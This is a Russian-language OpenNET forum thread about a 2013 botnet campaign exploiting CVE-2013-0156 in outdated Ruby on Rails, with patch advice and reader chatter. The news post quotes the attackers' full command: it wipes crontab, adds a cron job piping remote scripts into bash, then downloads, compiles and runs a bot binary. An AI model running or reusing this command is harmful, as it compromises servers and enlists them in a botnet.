The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Зафиксирована массовая атака на уязвимые версии Ruby on Rails"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Зафиксирована массовая атака на уязвимые версии Ruby on Rails"  +/
Сообщение от opennews on 31-Май-13, 10:49 
В Сети зафиксирована (http://jarmoc.com/blog/2013/05/28/ror-cve-2013-0156-in-the-wild/) массовая атака на сайты, использующие устаревшие выпуски фреймворка  Ruby on Rails, содержащие неисправленную уязвимость CVE-2013-0156 (http://www.opennet.me/opennews/art.shtml?num=35792). Несмотря на то, что обновление  Ruby on Rails с исправлением уязвимости было представлено ещё в январе, остаётся достаточно много систем не установивших обновление и остающихся уязвимыми. Этим и воспользовались злоумышленники, намеренные сформировать новый ботнет на базе таких систем.

После эксплуатации уязвимости на сервер устанавливается специальная вредоносная программа, принимающая управляющие команды через IRC (используется канал #rails на сервере cvv4you.ru). В списке процессов вредоносная программа выглядит как "-- bash".

Загрузка вредоносного ПО активируется через Cron. После получения доступа к атакованной системе, на ней выполняется следующий код (загрузка и сборка приложения k.c):

<font color="#461b7e">
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

</font>

Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены свежие выпуски фреймворка 3.2.13, 3.1.12 или 2.3.18. Проверить активность вредоносного приложения можно по наличию файла /tmp/tan.pid.


URL: http://jarmoc.com/blog/2013/05/28/ror-cve-2013-0156-in-the-wild/
Новость: http://www.opennet.me/opennews/art.shtml?num=37064

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от Анонимусссссс on 31-Май-13, 10:49 
Ай, спасибо, добрый человек.
*Убежал проверяться.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

17. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +3 +/
Сообщение от Аноним (??) on 31-Май-13, 15:13 
Не читаешь сесуриту рассылку и держишь компилятор на сервере? ай ай ай
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

19. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  –2 +/
Сообщение от Аноним (??) on 31-Май-13, 17:17 
"сесуриту" ?  А это в куда?
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

23. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  –1 +/
Сообщение от zombardeer on 31-Май-13, 21:19 
отсутствие компилятора на сервере... как элемент защиты. виндовсятник?
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

27. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от Куяврик on 01-Июн-13, 14:47 
> отсутствие компилятора на сервере... как элемент защиты. виндовсятник?

скорее убунтоид, если разница кого-то волнует

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

2. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  –11 +/
Сообщение от Аноним (??) on 31-Май-13, 11:11 
под_linux_нету_вирусов.jpg
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "'Зафиксирована массовая атака на уязвимые версии Ruby on Rail.."  +4 +/
Сообщение от scorry (ok) on 31-Май-13, 11:18 
Ещё один из разряда «прочитал всё, не понял ни одной буквы».
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

5. "'Зафиксирована массовая атака на уязвимые версии Ruby on Rail.."  +3 +/
Сообщение от ВовкаОсиист (ok) on 31-Май-13, 11:42 
Да тут врятли дальше заголовка пошло дело.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

10. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от Аноним (??) on 31-Май-13, 13:12 
Это ж не вирус :) Резидентный вирусов, как в винде, под Линукс/BSD и правда нету.
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

21. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от XoRe (ok) on 31-Май-13, 18:06 
> Это ж не вирус :) Резидентный вирусов, как в винде, под Линукс/BSD
> и правда нету.

Вообще есть)
Но они очень редки, в пересчете на количество пользователей/серверов.
И чаще это руткиты.

Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

24. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от Аноним (??) on 01-Июн-13, 09:49 
Определение вируса (заодним и других зловредов) хоть в Википедии прочитай и заучи наизусть как устав караульной службы, если суть запомнить не можешь. Может, тебе это поможет не позориться на компьютерных форумах.
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

4. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  –1 +/
Сообщение от тигар (ok) on 31-Май-13, 11:22 
они поломали хетзнир?

--2013-05-31 10:21:32--  http://88.198.20.247/k.c
Connecting to 88.198.20.247:80... connected.
HTTP request sent, awaiting response...
и тишина...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от xdsl on 31-Май-13, 12:55 
У тебя неправильный юзерагент
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

9. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  –1 +/
Сообщение от тигар (ok) on 31-Май-13, 12:59 
> У тебя неправильный юзерагент

что-то я не заметил в том cronjob левого UA

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

12. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от Аноним (??) on 31-Май-13, 13:31 
User-Agent: Wget/1.13.4 (linux-gnu)
Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

14. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  –1 +/
Сообщение от тигар (ok) on 31-Май-13, 14:01 
[tiger@laptop]:~%wget --user-agent="Wget/1.13.4 (linux-gnu)" http://88.198.20.247/k.c
--2013-05-31 13:00:31--  http://88.198.20.247/k.c
HTTP request sent, awaiting response... 504 Gateway Time-out
2013-05-31 13:03:31 ERROR 504: Gateway Time-out.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

16. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от Аноним (??) on 31-Май-13, 15:02 
уже прикрыли хосты и айпи
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

13. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от Аноним (??) on 31-Май-13, 13:52 
ТолстОта
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

6. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  –2 +/
Сообщение от ано2анон on 31-Май-13, 12:42 
Что то по тенденции руби напоминает друшлак :D
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +6 +/
Сообщение от Аноним (??) on 31-Май-13, 13:18 
Как и всё, что админы поставили и оставили без внимания на длительное время.
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

25. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от Аноним (??) on 01-Июн-13, 09:51 
> Как и всё, что админы поставили и оставили без внимания на длительное
> время.

А если админа контрора берет только для внедрения, а потом фактически засылает его?

Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

18. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +2 +/
Сообщение от GentooBoy (ok) on 31-Май-13, 16:07 
причем тут руби? говориться про рельсы
http://www.cvedetails.com/vulnerability-list/vendor_id-10199...
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

20. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от robux (ok) on 31-Май-13, 17:34 
Он не знает что такое руби.
Да похоже и рельсы не знает что такое.
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

7. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +2 +/
Сообщение от Аноним (??) on 31-Май-13, 12:50 
>Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены

gcc

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

26. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."  +/
Сообщение от Аноним (??) on 01-Июн-13, 09:53 
>>Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены
> gcc

Прикинь, если выставленные наружу виндовые сервера (нам пытались такую технологию впарить). Такому серверу ничто не угрожает ... минут 15. Потом пипец.

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

28. "Зафиксирована массовая атака на уязвимые версии Ruby on Rails"  +/
Сообщение от бедный буратино (ok) on 01-Июн-13, 16:58 
https://jira.mongodb.org/browse/PYTHON-532
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру